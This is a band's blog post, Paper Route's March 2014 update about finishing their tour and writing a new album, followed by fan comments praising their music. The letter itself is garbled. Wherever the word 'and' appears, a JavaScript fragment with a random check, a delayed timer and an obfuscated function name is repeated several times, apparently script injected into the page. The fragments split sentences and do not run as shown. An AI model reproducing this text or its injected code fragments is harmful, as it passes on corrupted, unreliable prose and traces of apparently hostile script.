march 2014 update

Dear friends,

The last year andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and a half has been incredible for us, thanks to you. The process of making The Peace of Wild Things was such a whirlwind of change for the bandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and for each member personally. The majority of that change was hard, nearly fatal for Paper Route in many ways, but we’re writing this today to let you know we are fully alive andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and well. It was encouraging to see so many of you at shows this last year, some multiple times. We were gone much more than we were home, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and we knew that we had made the right choice by sticking it out andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and finishing The Peace of Wild Things andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and touring relentlessly on it. And now….we look to the future.

Currently, we are in Nashville seeing friends, loved ones, having bonfires, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and finding inspiration. More importantly though, we are writing our next album. We feel like this one will be really special, so be patient with us. You will get as many updates, videos, teasers etc. as we can come up with to keep the fire burning. We are in this together. Many of you have been supporting us since 2006 (first music released), or 2008 when we entered the chaotic world of touring. You are all why we’re still here, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and we thank you.

Enough with the formalities, we’re off to write our best album yet……

Sincerely,
Paper Route (JT, Gavin, Chad)

22 replies
  1. Brad Gross
    Brad Gross says:

Hey gang, glad you made The Peace of Wild things as it hasn’t left my rotation since I bought it. It’s very beautifully done and I appreciate the rawness of where that music came from, and at the same time lament what you guys endured to get there. I love this record and I’m so glad to see you guys having such great success with it! Miss you JT & Chad, sorry Gavin if we haven’t met yet, hopefully one day soon. Hope you guys play Chicago soon so I can see ya!!!

Here’s to the next record being even better!! Can’t wait to hear it!

Much Love & Big Hugs,
    Brad Gross

2. Bryan graham
    Bryan graham says:

That is super exciting. Taking time to rest with those you love is very important if not the most important. I pray you find that creative spark that leads you to make heart-felt music that matters. And then hit the road and lay it down so we can all dance and sing and celebrate. I appreciate your gifts and your kind souls. See you the northwest soon

3. Mark Delmege
    Mark Delmege says:

I heard “Second Chances” on Pandora back in July of 2012 and fell in love. You were playing at the Rock N Roll hotel in DC later that same month I believe and I saw you 3 more times within the following year. Saw you open for Switchfoot in both DC and Silver Spring and then saw you headline at DC9 which was so small and intimateand I loved it. Thank you for your amazing music.

4. Cindy Fluharty
    Cindy Fluharty says:

Your music gets me thru good times, bad times, work days, work-outs! I am and will always be behind you 100% and will travel to see you as much as my jobs allow me to! I can’t wait to hear whatever is coming up next! Remember – St Louis loves you guys!

5. kent barlow
    kent barlow says:

love the music and ethos of what you are about. our family has ached, celebrated, and hoped right along with the songs. we have seen the band live 3 times and have loved every show in its own right. looking forward to whats ahead – cheers!

6. Beth
    Beth says:

Hey guys! Just wanted you to know, I am a musician and a fan. You write awesome lyrics and I can’t get enough of your sound. I know your music is specialI, and I am praying for all of you. I can’t wait to hear the amazingness that is going to happen on this next album.

7. Cory Nordahl
    Cory Nordahl says:

Hey guys! I’m so happy to hear that your going strong and continuing to make amazing music. I saw you guys years ago, when you were on tour with Paramore. I remember clearly standing on the floor never even hearing your music and from th moment your set started I was blown away by the amazing variation of sounds and clarity of just how much you all loved what you were doing. After your first song finished me and my friend were in awe, a almost paralyzing awe trying to figure out just what glorious music just serenaded our ears. I have never, still to this day been so blown away by a opening band. Roy wilkins auditorium in st paul Minnesota has never been the same for me since that show. I hope I see you preform here again and I won’t have to miss it this time. Thabk you so much for making musical perfection, not only with Absence, but with The Peace of Wild Things as well, I’m so excited to hear what’s coming next!

8. Joshua Gilbert
    Joshua Gilbert says:

Hey guys,

I’m an independent event promoter in the D.C. area I was hoping you’d guys be up having a show with me next time you’re all in the area! I’m a huge fan of your music.

I was hoping to do a percentage of profits for charity – hopefully to some missions in D.R. or to combat human slavery with movements like “EndIt” and others. I am a technical advisor and videographer/photographer for a few local bands in your genre and I feel they would be blessed to share the stage with you guys.

If you’re interested, please email soon! D.C./NOVA needs more Paper Route.

GB,

Joshua Gilbert

JG Photography and Events

9. Jenna
    Jenna says:

I have been a major fan of your music since I first purchased your Absence album. I would take long car rides and just listen to that album as I drove. All of those songs became addicting to me and they are STILL addicting! It’s not often that I find an album that is so special in this way. Your Peace of Wild Things album was equally as impressive, but in a different way. You managed to keep your general style (which is unique and wonderful!) and the songs were so touching as well – especially “Calm My Soul.” Just beautiful.

I will forever remain a huge fan. I hope that you have many more albums in your future. I am very much looking forward to this new treasure you’re currently producing!

Thanks for bringing such amazing music into this world!

10. Jeans Beans
    Jeans Beans says:

I am so happy for you all and am beyond thrilled for the next album! I know that it is never easy to be away from your loved ones during tour so it means a lot and we appreciate it wholeheartedly, Love you all and big huuggggsssss! 🙂

11. Jonathan Barone
    Jonathan Barone says:

I wanted to thank you and encourage you for your creation and in your creation of beautiful music. I really appreciate the passion with which you all devote yourselves to this band. I really enjoy All We All Forgotten, I love Absence, and I’ve been continually listening to The Peace of Wild Things since I got it. You are all incredible, and I wish you the best of luck. May creativity flow from you like a river.

12. Daniel Torres
    Daniel Torres says:

You guys make the best kind of music. The kind that inspires our imaginations, the kind that makes us think, and the kind that inspires. Yes, most styles and types of music have been pioneered and done before, but you guys unlike countless other bands is your sincerity. It’s real. Big music makes thousands of jams that are catchy and popular, but are made artificially for the masses. Paper Route is different. Every word, beat, and note comes from your souls. You take us to your day dream and inspire our own. Listening to your art and watching you perform live was incredible to say the least. Never lose your passion and love for music. Please continue to share your gifts and music. I will always count on your tracks when life overwhelms me to find my peace.” Sugar” will be the song for my future wife on our wedding day. I hope i can take her to your concerts whenever you’re nearby. I hope that perhaps i can take my kids to hear you as well. I can’t wait for the next album!

13. Stef
    Stef says:

Hey guys,

first of all – thanks for making such great music – can’t stop listening to it :-)))

Unfortunately I didn’t have the chance to see you live during your last tour…

I’m from Germany so I really hope you will come over to Europe in the near future and play some gigs there 😉

14. John
    John says:

awesome! looking forward to hearing new music! “The Peace of Wild Things” was the soundtrack to my wife and I’s dating relationship haha.

15. Mandy Clive
    Mandy Clive says:

We couldn’t love you more in Phoenix! Looking forward to the next album, and can’t wait to see you guys back on tour when the time comes!

Want to join the discussion?
Feel free to contribute!